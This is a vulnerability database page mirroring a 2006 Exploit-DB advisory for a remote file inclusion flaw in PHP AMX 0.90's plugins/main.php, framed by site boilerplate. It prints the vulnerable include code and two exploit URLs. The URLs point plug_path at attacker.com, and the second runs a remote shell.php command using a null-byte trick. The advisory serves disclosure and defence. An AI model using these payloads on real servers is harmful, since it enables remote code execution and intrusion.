Lucene search
+L

PHP AMX 0.90 - '/plugins/main.php' Remote File Inclusion

🗓️ 18 Oct 2006 00:00:00Reported by MPType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

PHP AMX 0.90 Remote File Inclusion Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2006-5427
20 Oct 200617:00
cve
Cvelist
CVE-2006-5427
20 Oct 200617:00
cvelist
EUVD
EUVD-2006-5412
7 Oct 202500:30
euvd
NVD
CVE-2006-5427
20 Oct 200617:07
nvd
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ phpamx 0.90 ]                                     #
#
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes
# Local:     No       						#
# Type:      High                                               #
# Site:      http://sourceforge.net/projects/phpamx/            #
# Author:    MP
# Contact:   [email protected]     				#
#        							#
#################################################################

Vuln Code
 (php/plugins/main.php):
<?php
include($plug_path."!playtime_top15.php");
include($plug_path."!mapcycle_list.php");
//nothing here
?>

#Vuln 1.0 -> require register_globals = On
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/


#Vuln 2.0 -> require magic_quotes_gpc = Off
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00

# milw0rm.com [2006-10-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.1
EPSS0.02971
41